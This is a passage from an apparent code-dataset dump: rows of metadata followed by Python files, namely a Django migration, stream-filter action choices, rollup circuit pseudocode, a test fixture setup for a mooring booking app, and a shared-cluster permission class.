print('</body>') | 39.422535 | 148 | 0.679886 | 417 | 2,799 | 4.472422 | 0.40048 | 0.015013 | 0.016086 | 0.017158 | 0.211796 | 0.138338 | 0.138338 | 0.106166 | 0.106166 | 0.066488 | 0 | 0.028909 | 0.184352 | 2,799 | 71 | 149 | 39.422535 | 0.787998 | 0.350125 | 0 | 0.051282 | 1 | 0.128205 | 0.358575 | 0.139755 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051282 | 0 | 0.051282 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c269dde7109479fb6efad17159039578bb957d1e | 552 | py | Python | blog/migrations/0004_post_category.py | tahasama/T-Blogit | ae0e85765d21d702da57be7c23a2e67d5889042d | [
"MIT"
] | null | null | null | blog/migrations/0004_post_category.py | tahasama/T-Blogit | ae0e85765d21d702da57be7c23a2e67d5889042d | [
"MIT"
] | null | null | null | blog/migrations/0004_post_category.py | tahasama/T-Blogit | ae0e85765d21d702da57be7c23a2e67d5889042d | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-20 14:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Must run after the migration that created the Category model.
    dependencies = [
        ('blog', '0003_category'),
    ]
    # Adds a required FK Post.category -> blog.Category (cascade delete).
    # default=1 backfills existing rows with the category of pk 1;
    # preserve_default=False means that default is not kept on the field
    # after the migration runs.
    operations = [
        migrations.AddField(
            model_name='post',
            name='category',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='blog_category', to='blog.category'),
            preserve_default=False,
        ),
    ]
| 26.285714 | 143 | 0.61413 | 61 | 552 | 5.459016 | 0.622951 | 0.072072 | 0.084084 | 0.132132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049628 | 0.269928 | 552 | 20 | 144 | 27.6 | 0.776675 | 0.081522 | 0 | 0 | 1 | 0 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c26fcb06b64b44f5a26f198468b7bddf5846a95b | 396 | py | Python | server/apps/streamfilter/actions/types.py | iotile/iotile_cloud | 9dc65ac86d3a730bba42108ed7d9bbb963d22ba6 | [
"MIT"
] | null | null | null | server/apps/streamfilter/actions/types.py | iotile/iotile_cloud | 9dc65ac86d3a730bba42108ed7d9bbb963d22ba6 | [
"MIT"
] | null | null | null | server/apps/streamfilter/actions/types.py | iotile/iotile_cloud | 9dc65ac86d3a730bba42108ed7d9bbb963d22ba6 | [
"MIT"
] | null | null | null |
# Choice tuples (value, human-readable label) for stream-filter actions,
# in the usual Django choices format.

# When the action fires relative to the filter's matching state:
# on entering the state or on leaving it.
FILTER_ACTION_ON_CHOICES = (
    ('entry', 'On Entry'),
    ('exit', 'On Exit'),
)
# What kind of action to perform when the filter triggers.
FILTER_ACTION_TYPE_CHOICES = (
    ('eml', 'Send Email Notification'),
    ('sms', 'Send SMS Notification'),
    ('slk', 'Send Slack Notification'),
    ('cus', 'Custom Action'),
    ('drv', 'Derive Stream Action'),
    ('rpt', 'Report Generation Action'),
    ('smry', 'Summary Report Generation Action'),
)
| 22 | 49 | 0.59596 | 42 | 396 | 5.47619 | 0.571429 | 0.104348 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207071 | 396 | 17 | 50 | 23.294118 | 0.732484 | 0 | 0 | 0 | 0 | 0 | 0.513995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c274f1539367101bb7e5be3fc70ed5dd3ad7eb39 | 14,993 | py | Python | docs/circuit.py | smishraIOV/ri-aggregation | abcd90954335b6ee8513876de0118f567d979a32 | [
"Apache-2.0",
"MIT"
] | 1,274 | 2019-12-05T15:32:00.000Z | 2022-03-31T19:24:23.000Z | docs/circuit.py | smishraIOV/ri-aggregation | abcd90954335b6ee8513876de0118f567d979a32 | [
"Apache-2.0",
"MIT"
] | 190 | 2019-12-05T16:27:08.000Z | 2022-03-31T20:03:06.000Z | docs/circuit.py | smishraIOV/ri-aggregation | abcd90954335b6ee8513876de0118f567d979a32 | [
"Apache-2.0",
"MIT"
] | 309 | 2019-12-09T09:26:01.000Z | 2022-03-31T13:10:17.000Z | # Citcuit pseudocode
# Data structures
struct op:
# operation data
tx_type: # type of transaction, see the list: https://docs.google.com/spreadsheets/d/1ejK1MJfVehcwjgjVDFD3E2k1EZ7auqbG_y0DKidS9nA/edit#gid=0
chunk: # op chunk number (0..3)
pubdata_chunk: # current chunk of the pubdata (always 8 bytes)
args: # arguments for the operation
# Merkle branches
lhs: # left Merkle branch data
rhs: # right Merkle branch data
clear_account: # bool: instruction to clear the account in the current branch
clear_subaccount: # bool: instruction to clear the subaccount in the current branch
# precomputed witness:
a: # depends on the optype, used for range checks
b: # depends on the optype, used for range checks
new_root: # new state root after the operation is applied
account_path: # Merkle path witness for the account in the current branch
subtree_path: # Merkle path witness for the subtree in the current branch
struct cur: # current Merkle branch data
struct computed:
last_chunk: # bool: whether the current chunk is the last one in sequence
pubdata: # pubdata accumulated over all chunks
range_checked: # bool: ensures that a >= b
new_pubkey_hash: # hash of the new pubkey, truncated to 20 bytes (used only for deposits)
# Circuit functions
def circuit:
running_hash := initial_hash
current_root := last_state_root
prev.lhs := { 0, ... }
prev.rhs := { 0, ... }
prev.chunk := 0
prev.new_root := 0
for op in operations:
# enfore correct bitlentgh for every input in witness
# TODO: create a macro gadget to recursively iterate over struct member annotations (ZKS-119).
for x in op:
verify_bitlength(x)
# check and prepare data
verify_correct_chunking(op, computed)
accumulate_sha256(op.pubdata_chunk)
accumulate_pubdata(op, computed)
# prepare Merkle branch
cur := select_branch(op, computed)
cur.cosigner_pubkey_hash := hash(cur.cosigner_pubkey)
# check initial Merkle paths, before applying the operation
op.clear_account := False
op.clear_subaccount := False
state_root := check_account_data(op, cur, computed, check_intersection = False)
enforce state_root == current_root
# check validity and perform state updates for the current branch by modifying `cur` struct
execute_op(op, cur, computed)
# check final Merkle paths after applying the operation
new_root := check_account_data(op, cur, computed, check_intersection = True)
# NOTE: this is checked separately for each branch side, and we already enforced
# that `op.new_root` remains unchanged for both by enforcing that it is shared by all chunks
enforce new_root == op.new_root
# update global state root on the last op chunk
if computed.last_chunk:
current_root = new_root
# update `prev` references
# TODO: need a gadget to copy struct members one by one (ZKS-119).
prev.rhs = op.rhs
prev.lhs = op.lhs
prev.args = op.args
prev.new_root = op.new_root
prev.chunk = op.chunk
# final checks after the loop end
enforce current_root == new_state_root
enforce running_hash == pubdata_hash
enforce last_chunk # any operation should close with the last chunk
# make sure that operation chunks are passed correctly
def verify_correct_chunking(op, computed):
# enforce chunk sequence correctness
enforce (op.chunk == 0) or (op.chunk == prev.chunk + 1) # ensure that chunks come in sequence
max_chunks := switch op.tx_type
deposit => 4,
transfer_to_new=> 1,
transfer => 2,
# ...and so on
enforce op.chunk < max_chunks # 4 constraints
computed.last_chunk = op.chunk == max_chunks-1 # flag to mark the last op chunk
# enforce that all chunks share the same witness:
# - `op.args` for the common arguments of the operation
# - `op.lhs` and `op.rhs` for left and right Merkle branches
# - `new_root` of the state after the operation is applied
correct_inputs :=
op.chunk == 0 # skip check for the first chunk
or (
prev.args == op.args and
prev.lhs == op.lhs and
prev.rhs == op.rhs and
prev.new_root == op.new_root
) # TODO: need a gadget for logical equality which works with structs (ZKS-119).
enforce correct_inputs
# accumulate pubdata from multiple chunks
def accumulate_pubdata(op, computed):
computed.pubdata =
if op.chunk == 0:
op.pubdata_chunk # initialize from the first chunk
else:
computed.pubdata << 8 + op.pubdata_chunk
# determine the Merkle branch side (0 for LHS, 1 for RHS) and set `cur` for the current Merkle branch
def select_branch(op, computed):
op.current_side := LHS if op.tx_type == 'deposit' else op.chunk
# TODO: need a gadget for conditional swap applied to each struct member (ZKS-119).
cur := op.lhs if current_side == LHS else op.rhs
return cur
def check_account_data(op, cur, computed, check_intersection):
# leaf data for account and balance leaves
subaccount_data := (
cur.subaccount_balance,
cur.subaccount_nonce,
cur.creation_nonce,
cur.cosigner_pubkey_hash,
cur.cosigner_balance,
cur.subaccount_token)
balance_data := cur.balance
# subaccount emptiness check and clearing
cur.subaccount_is_empty := subaccount_data == EMPTY_SUBACCOUNT
subaccount_data = EMPTY_SUBACCOUNT if clear_subaccount else subaccount_data
# subtree Merkle checks
balances_root := merkle_root(token, op.balances_path, balance_data)
subaccounts_root := merkle_root(token, op.balances_path, subaccount_data)
subtree_root := hash(balances_root, subaccounts_root)
# account data
account_data := hash(cur.owner_pub_key, cur.subtree_root, cur.account_nonce)
# account emptiness check and clearing
cur.account_is_empty := account_data == EMPTY_ACCOUNT
account_data = EMPTY_ACCOUNT if clear_account else account_data
# final state Merkle root verification with conditional intersection check
intersection_path := intersection(op.account_path, cur.account, lhs.account, rhs.account,
lhs.intersection_hash, rhs.intersection_hash)
path_witness := intersection_path if check_intersection else op.account_path
state_root := merkle_root(cur.account, path_witness, account_data)
return state_root
# verify operation and execute state updates
def execute_op(op, cur, computed):
# universal range check
computed.range_checked := op.a >= op.b
# unpack floating point values and hashes
op.args.amount := unpack(op.args.amount_packed)
op.args.fee := unpack(op.args.fee_packed)
# some operations require tighter amount packing (with less precision)
computed.compact_amount_correct := op.args.amount == op.args.compact_amount * 256
# new pubkey hash for deposits
computed.new_pubkey_hash := hash(cur.new_pubkey)
# signature check
# NOTE: signature check must always be valid, but msg and signer can be phony
enforce check_sig(cur.sig_msg, cur.signer_pubkey)
# execute operations
op_valid := False
op_valid = op_valid or op.tx_type == 'noop'
op_valid = op_valid or transfer_to_new(op, cur, computed)
op_valid = op_valid or deposit(op, cur, computed)
op_valid = op_valid or close_account(op, cur, computed)
op_valid = op_valid or withdraw(op, cur, computed)
op_valid = op_valid or escalation(op, cur, computed)
op_valid = op_valid or create_subaccount(op, cur, computed)
op_valid = op_valid or close_subaccount(op, cur, computed)
op_valid = op_valid or fill_orders(op, cur, computed)
# `op` MUST be one of the operations and MUST be valid
enforce op_valid
def transfer_to_new(op, cur, computed):
# transfer_to_new validation is split into lhs and rhs; pubdata is combined from both branches
lhs_valid :=
op.tx_type == 'transfer_to_new'
# here we process the first chunk
and op.chunk == 0
# sender authorized spending and recepient
and lhs.sig_msg == hash('transfer_to_new', lhs.account, lhs.token, lhs.account_nonce, op.args.amount_packed,
op.args.fee_packed, cur.new_pubkey)
# sender is account owner
and lhs.signer_pubkey == cur.owner_pub_key
# sender has enough balance: we checked above that `op.a >= op.b`
# NOTE: no need to check overflow for `amount + fee` because their bitlengths are enforced]
and computed.range_checked and (op.a == cur.balance) and (op.b == (op.args.amount + op.args.fee) )
# NOTE: updating the state is done by modifying data in the `cur` branch
if lhs_valid:
cur.leaf_balance = cur.leaf_balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.account_nonce + 1
rhs_valid :=
op.tx_type == 'transfer_to_new'
# here we process the second (last) chunk
and op.chunk == 1
# compact amount is passed to pubdata for this operation
and computed.compact_amount_correct
# pubdata contains correct data from both branches, so we verify it agains `lhs` and `rhs`
and pubdata == (op.tx_type, lhs.account, lhs.token, lhs.compact_amount, cur.new_pubkey_hash, rhs.account, rhs.fee)
# new account branch is empty
and cur.account_is_empty
# sender signed the same recepient pubkey of which the hash was passed to public data
and lhs.new_pubkey == rhs.new_pubkey
if rhs_valid:
cur.leaf_balance = op.args.amount
return lhs_valid or rhs_valid
def deposit(op, cur, computed):
    # pubdata is only verified on the last chunk of the deposit op
    ignore_pubdata := not last_chunk
    tx_valid :=
        op.tx_type == 'deposit'
        and (ignore_pubdata or pubdata == (cur.account, cur.token, args.compact_amount, cur.new_pubkey_hash, args.fee))
        # deposits may only target an empty account leaf
        and cur.is_account_empty
        and computed.compact_amount_correct
        # the universal range check (set in execute_op) guarantees amount >= fee
        and computed.range_checked and (op.a == op.args.amount) and (op.b == op.args.fee)
    if tx_valid:
        cur.leaf_balance = op.args.amount - op.args.fee
    return tx_valid
def close_account(op, cur, computed):
    # Closing an account clears the whole account leaf; the owner signs
    # over the account id and its current subtree root.
    tx_valid :=
        op.tx_type == 'close_account'
        and pubdata == (cur.account, cur.subtree_root)
        and cur.sig_msg == ('close_account', cur.account, cur.leaf_index, cur.account_nonce, cur.amount, cur.fee)
        and cur.signer_pubkey == cur.owner_pub_key
    if tx_valid:
        # instructs check_account_data to replace the leaf with EMPTY_ACCOUNT
        op.clear_account = True
    return tx_valid
def no_nonce_overflow(nonce):
nonce_overflow := cur.leaf_nonce == 0x10000-1 # nonce is 2 bytes long
return not nonce_overflow
def withdraw(op, cur, computed):
    # A withdrawal debits amount + fee from the balance of the account on
    # the current branch, authorized by the account owner's signature.
    tx_valid :=
        op.tx_type == 'withdraw'
        and computed.compact_amount_correct
        and pubdata == (op.tx_type, cur.account, cur.token, op.args.amount, op.args.fee)
        # universal range check (a >= b, set in execute_op) => balance covers amount + fee
        and computed.range_checked and (op.a == cur.balance) and (op.b == (op.args.amount + op.args.fee) )
        and cur.sig_msg == ('withdraw', cur.account, cur.token, cur.account_nonce, cur.amount, cur.fee)
        and cur.signer_pubkey == cur.owner_pub_key
        and no_nonce_overflow(cur.leaf_nonce)
    if tx_valid:
        cur.balance = cur.balance - (op.args.amount + op.args.fee)
        # NOTE(review): mixes `leaf_nonce` and `account_nonce` — presumably both
        # should refer to the same account nonce; confirm against the real circuit.
        cur.account_nonce = cur.leaf_nonce + 1
    return tx_valid
def escalation(op, cur, computed):
tx_valid :=
op.tx_type == 'escalation'
and pubdata == (op.tx_type, cur.account, cur.subaccount, cur.creation_nonce, cur.leaf_nonce)
and cur.sig_msg == ('escalation', cur.account, cur.subaccount, cur.creation_nonce)
(cur.signer_pubkey == cur.owner_pub_key or cur.signer_pubkey == cosigner_pubkey)
if tx_valid:
cur.clear_subaccount = True
return tx_valid
def transfer(op, cur, computed):
lhs_valid :=
op.tx_type == 'transfer'
and op.chunk == 0
and lhs.sig_msg == ('transfer', lhs.account, lhs.token, lhs.account_nonce, op.args.amount_packed,
op.args.fee_packed, rhs.account_pubkey)
and lhs.signer_pubkey == cur.owner_pub_key
and computed.range_checked and (op.a == cur.balance) and (op.b == (op.args.amount + op.args.fee) )
and no_nonce_overflow(cur.account_nonce)
if lhs_valid:
cur.balance = cur.balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.account_nonce + 1
rhs_valid :=
op.tx_type == 'transfer'
and op.chunk == 1
and not cur.account_is_empty
and pubdata == (op.tx_type, lhs.account, lhs.token, op.args.amount, rhs.account, op.args.fee)
and computed.range_checked and (op.a == (cur.balance + op.args.amount) ) and (op.b == cur.balance )
if rhs_valid:
cur.balance = cur.balance + op.args.amount
return lhs_valid or rhs_valid
# Subaccount operations
def create_subaccount(op, cur, computed):
# On the LHS we have cosigner, we only use it for a overflow check
lhs_valid: =
op.tx_type == 'create_subaccount'
and op.chunk == 0
and computed.range_checked and (op.a == rhs.balance) and (op.b == (op.args.amount + op.args.fee) )
# We process everything else on the RHS
rhs_valid :=
op.tx_type == 'create_subaccount'
and op.chunk == 1
and cur.sig_msg == (
'create_subaccount',
cur.account, # cur = rhs
lhs.account, # co-signer account on the lhs
cur.token,
cur.account_nonce,
op.args.amount_packed,
op.args.fee_packed )
and cur.signer_pubkey == cur.owner_pub_key
and cur.subaccount_is_empty
and pubdata == (op.tx_type, lhs.account, lhs.leaf_index, op.args.amount, rhs.account, op.args.fee)
and computed.range_checked and (op.a == (cur.subaccount_balance + op.args.amount) ) and (op.b == cur.subaccount_balance)
and no_nonce_overflow(cur.account_nonce)
if rhs_valid:
# initialize subaccount
cur.subaccount_balance = cur.subaccount_balance + op.args.amount
cur.creation_nonce = cur.account_nonce
cur.cosigner_pubkey = lhs.account_pubkey
cur.subaccount_token = cur.token
# update main account
cur.balance = cur.balance - (op.args.amount + op.args.fee)
cur.account_nonce = cur.account_nonce + 1
return lhs_valid or rhs_valid
def close_subaccount(op, cur, computed):
# tbd: similar to create_subaccount()
def fill_orders(op, cur, computed):
# tbd
| 36.127711 | 155 | 0.663776 | 2,098 | 14,993 | 4.576263 | 0.13632 | 0.028747 | 0.029997 | 0.01604 | 0.382148 | 0.306218 | 0.267472 | 0.242891 | 0.171024 | 0.127695 | 0 | 0.00589 | 0.252651 | 14,993 | 414 | 156 | 36.214976 | 0.850959 | 0.273127 | 0 | 0.240506 | 0 | 0 | 0.01851 | 0 | 0 | 0 | 0.000648 | 0.002415 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c277d4a85593300f9dfb007c56b23edbc8c04421 | 9,277 | py | Python | mooring/test_setup.py | jawaidm/moorings | 22db3fa5917fb13cbee144e64529221ef862cb39 | [
"Apache-2.0"
] | null | null | null | mooring/test_setup.py | jawaidm/moorings | 22db3fa5917fb13cbee144e64529221ef862cb39 | [
"Apache-2.0"
] | 2 | 2020-04-30T12:02:15.000Z | 2021-03-19T22:41:46.000Z | mooring/test_setup.py | jawaidm/moorings | 22db3fa5917fb13cbee144e64529221ef862cb39 | [
"Apache-2.0"
] | 6 | 2020-01-13T08:45:09.000Z | 2021-02-24T03:31:02.000Z | from django.test import TestCase
from django.test import Client
from mixer.backend.django import mixer
from django.conf import settings
from importlib import import_module
import time
from .models import *
#from drf_extra_fields.geo_fields import PointField
from django.contrib.gis.geos import Point
from ledger.accounts.models import EmailUser, EmailUserManager
from ledger.payments.models import Invoice, OracleInterfaceSystem
from oscar.apps.order.models import Order
import random
import string
class TestSetup(TestCase):
    """Common fixture base for mooring tests.

    Creates a superuser, a staff admin and a plain customer; a Rottnest
    mooring-group data set (region, district, park, mooring area/site,
    booking periods, rates, admissions records, a spread of bookings);
    and a persisted session attached to the test client.
    """

    def setUp(self):
        # FIX: removed large amounts of dead commented-out code and the unused
        # `superadminUser/adminUser/user = None` locals from the original.
        self.client = Client()

        # Fixed test-account emails: superuser / staff admin / plain customer.
        self.superAdminUN = 'test.superadmin@dbcatest.com'
        self.adminUN = 'test.admin@dbcatest.com'
        self.nonAdminUN = 'test.customer@dbcatest.com'

        # NOTE(review): `eum` is never used afterwards; kept in case
        # instantiating EmailUserManager has side effects — confirm.
        eum = EmailUserManager()

        # Superuser account.
        self.superadminUser = EmailUser.objects.create(email=self.superAdminUN, password="pass", is_staff=True, is_superuser=True)
        self.superadminUser.set_password('pass')
        self.superadminUser.save()

        # Staff (admin) account.
        self.adminUser = EmailUser.objects.create(email=self.adminUN, password="pass", is_staff=True, is_superuser=False)
        self.adminUser.set_password('pass')
        self.adminUser.save()

        # Plain customer account.
        self.customer = EmailUser.objects.create(email=self.nonAdminUN, password="pass", is_staff=False, is_superuser=False)
        self.customer.set_password('pass')
        self.customer.save()

        # Mooring groups and a shared global setting (key=2, value=25) for each.
        ria = MooringAreaGroup.objects.create(name='Rottnest')
        pvs = MooringAreaGroup.objects.create(name='PVS')
        GlobalSettings.objects.create(key=2, mooring_group=ria, value=25)
        GlobalSettings.objects.create(key=2, mooring_group=pvs, value=25)

        # Rottnest Island location hierarchy.
        adLoc = AdmissionsLocation.objects.create(key='ria', text='Rottnest Island Authority', mooring_group=ria)
        region = Region.objects.create(name='Rottnest Island', abbreviation='rottnest-island', ratis_id=10, wkb_geometry=Point(115.56141, -32.07424), zoom_level='10', mooring_group=ria)
        district = District.objects.create(name='Rottnest Island', abbreviation='rottnest-island', region=region, ratis_id=10, mooring_group=ria)

        # The admin user belongs to the Rottnest group.
        ria.members.add(self.adminUser)
        ria.save()

        # Orders and invoices for the admin and customer users.
        orderAdmin = mixer.blend(Order, user=self.adminUser)
        invoiceAdmin = mixer.blend(Invoice, order_number=orderAdmin.number, reference="123456")
        userNonAdmin = EmailUser.objects.get(email=self.nonAdminUN)
        orderNonAdmin = mixer.blend(Order, user=self.customer)
        invoiceNonAdmin = mixer.blend(Invoice, order_number=orderNonAdmin.number, reference="987654")

        # Admissions fixtures: reason, fee schedule, oracle code, and a
        # booking with a single admission line.
        aReason = AdmissionsReason.objects.create(text="abc", detailRequired=False, editable=True, mooring_group=ria)
        self.adRate = AdmissionsRate.objects.create(
            period_start=datetime.now() - timedelta(days=2), period_end=None, adult_cost="15",
            adult_overnight_cost="20", concession_cost="5", concession_overnight_cost="7", children_cost="5",
            children_overnight_cost="7", infant_cost="5", infant_overnight_cost="7", family_cost="30", family_overnight_cost="40",
            comment=None, reason=aReason, mooring_group=ria)
        AdmissionsOracleCode.objects.create(oracle_code="0516", mooring_group=ria)
        adBooking = AdmissionsBooking.objects.create(customer=self.customer, booking_type=1, vesselRegNo="ABC123", noOfAdults=1, noOfConcessions=0, noOfChildren=0, noOfInfants=0, warningReferenceNo="", totalCost=10.50)
        adLine = AdmissionsLine.objects.create(arrivalDate=datetime.now(), overnightStay=False, admissionsBooking=adBooking, cost='10.50', location=adLoc)

        # Park, mooring area and mooring site with a booking period and rate.
        openReason = mixer.blend(OpenReason, detailRequired=False, mooring_group=ria)
        self.prReason = mixer.blend(PriceReason, detailRequired=False, mooring_group=ria)
        self.park = mixer.blend(MarinePark, zoom_level=1, oracle_code="0516", mooring_group=ria, district=district)
        self.area = mixer.blend(MooringArea, park=self.park, mooring_group=ria, name='Mooring 1', address={})
        self.areaGroup = ria
        self.site = mixer.blend(Mooringsite, mooringarea=self.area)
        self.bpo = mixer.blend(BookingPeriodOption)
        self.bp = mixer.blend(BookingPeriod, booking_period=self.bpo)
        self.bp2 = BookingPeriod.objects.create(name='selfbp2')
        self.siteRate = mixer.blend(MooringsiteRate, campsite=self.site, booking_period=self.bp, reason=self.prReason)

        # A booking plus a mooring-site booking spanning days +1 to +4.
        self.booking = mixer.blend(Booking, departure=datetime.now(), arrival=datetime.now() - timedelta(days=3), mooringarea=self.area)
        self.msBooking = mixer.blend(MooringsiteBooking, campsite=self.site, booking=self.booking, from_dt=(datetime.now() + timedelta(days=1)).date(), to_dt=(datetime.now() + timedelta(days=4)).date())

        # Handy references for subclasses, plus extra reason fixtures.
        self.region = region
        self.ria = ria
        self.adLoc = adLoc
        self.adReason = mixer.blend(AdmissionsReason, detailRequired=False, mooring_group=ria)
        self.opReason = mixer.blend(OpenReason, detailRequired=False, mooring_group=ria)
        self.maxStayReason = mixer.blend(MaximumStayReason, detailRequired=False, mooring_group=ria)

        # Bookings with a spread of arrival/departure windows around "now".
        # FIX: `self. bb` (stray space) normalized to `self.bb` — same attribute.
        self.bb = mixer.blend(Booking, mooringarea=self.area, arrival=datetime.now(), departure=datetime.now() + timedelta(days=1), details={'details': 'Some details'})
        self.nowplus1 = Booking.objects.create(arrival=datetime.now(), departure=datetime.now() + timedelta(days=1), mooringarea=self.area)
        self.nowplus2 = Booking.objects.create(arrival=datetime.now(), departure=datetime.now() + timedelta(days=2), mooringarea=self.area)
        self.nowplus3 = Booking.objects.create(arrival=datetime.now(), departure=datetime.now() + timedelta(days=3), mooringarea=self.area)
        self.oneplus4 = Booking.objects.create(arrival=datetime.now() + timedelta(days=1), departure=datetime.now() + timedelta(days=4), mooringarea=self.area)
        self.twotonow = Booking.objects.create(departure=datetime.now(), arrival=datetime.now() - timedelta(days=2), mooringarea=self.area)
        self.threetonow = Booking.objects.create(departure=datetime.now(), arrival=datetime.now() - timedelta(days=3), mooringarea=self.area)

        # Persist a file-backed session and attach its key to the test client's
        # cookie so views that require a session see it on each request.
        settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
        engine = import_module(settings.SESSION_ENGINE)
        store = engine.SessionStore()
        store.save()
        self.session = store
        self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key

    def random_email(self):
        """Return a random email address ending in dbca.wa.gov.au
        (an 80-letter local part of ASCII letters).
        """
        s = ''.join(random.choice(string.ascii_letters) for i in range(80))
        return '{}@dbca.wa.gov.au'.format(s)
#def random_email():
# """Return a random email address ending in dbca.wa.gov.au
# """
# s = ''.join(random.choice(string.ascii_letters) for i in range(80))
# return '{}@dbca.wa.gov.au'.format(s)
#
#
#load_superAdminUN = random_email()
#load_adminUN = random_email()
#load_nonAdminUN = random_email()
#
#load_superadminUser = EmailUser.objects.create_superuser(email=load_superAdminUN, password="pass")
#load_adminUser = EmailUser.objects.create_user(email=load_adminUN, password="pass", )
#load_customer = EmailUser.objects.create(email=load_nonAdminUN, password="pass", is_staff=False, is_superuser=False)
| 57.265432 | 218 | 0.713485 | 1,106 | 9,277 | 5.88698 | 0.232369 | 0.055905 | 0.036861 | 0.044233 | 0.40685 | 0.283059 | 0.225311 | 0.201659 | 0.190908 | 0.13792 | 0 | 0.016433 | 0.160397 | 9,277 | 161 | 219 | 57.621118 | 0.819489 | 0.267651 | 0 | 0 | 0 | 0 | 0.050289 | 0.016911 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0.068182 | 0.159091 | 0 | 0.204545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c27ef209ac9851af64ea4375eae1f4a2a3f60001 | 1,433 | py | Python | bcs-ui/backend/container_service/clusters/permissions.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/container_service/clusters/permissions.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/container_service/clusters/permissions.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from rest_framework.permissions import BasePermission
from backend.container_service.clusters.base.utils import get_cluster_type
from backend.container_service.clusters.constants import ClusterType
class AccessClusterPermission(BasePermission):
    """Reject every request that targets a shared cluster."""

    message = '当前请求的 API 在共享集群中不可用'

    def has_permission(self, request, view):
        # Prefer the cluster id from the URL kwargs; fall back to the
        # query string when the kwarg is missing or empty.
        cluster_id = view.kwargs.get('cluster_id')
        if not cluster_id:
            cluster_id = request.query_params.get('cluster_id')
        return get_cluster_type(cluster_id) != ClusterType.SHARED
class AccessClusterPermMixin:
    """Mixin that prepends the shared-cluster guard to a view's permissions."""

    def get_permissions(self):
        # Run the shared-cluster check before any other permission class.
        existing = super().get_permissions()
        return [AccessClusterPermission()] + existing
| 38.72973 | 115 | 0.76762 | 187 | 1,433 | 5.802139 | 0.647059 | 0.0553 | 0.023963 | 0.029493 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009106 | 0.157013 | 1,433 | 36 | 116 | 39.805556 | 0.889073 | 0.534543 | 0 | 0 | 0 | 0 | 0.060372 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0.090909 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c285df3f99628a1b19eebe052fedde4a3ad13b98 | 3,012 | py | Python | landmark-recognition-2019/distribute_predict.py | StudyExchange/Kaggle | e8306cc34da6b0ec91955d8f62124459981e605e | [
"MIT"
] | 2 | 2019-04-19T12:51:31.000Z | 2019-04-19T12:51:34.000Z | landmark-recognition-2019/distribute_predict.py | StudyExchange/Kaggle | e8306cc34da6b0ec91955d8f62124459981e605e | [
"MIT"
] | null | null | null | landmark-recognition-2019/distribute_predict.py | StudyExchange/Kaggle | e8306cc34da6b0ec91955d8f62124459981e605e | [
"MIT"
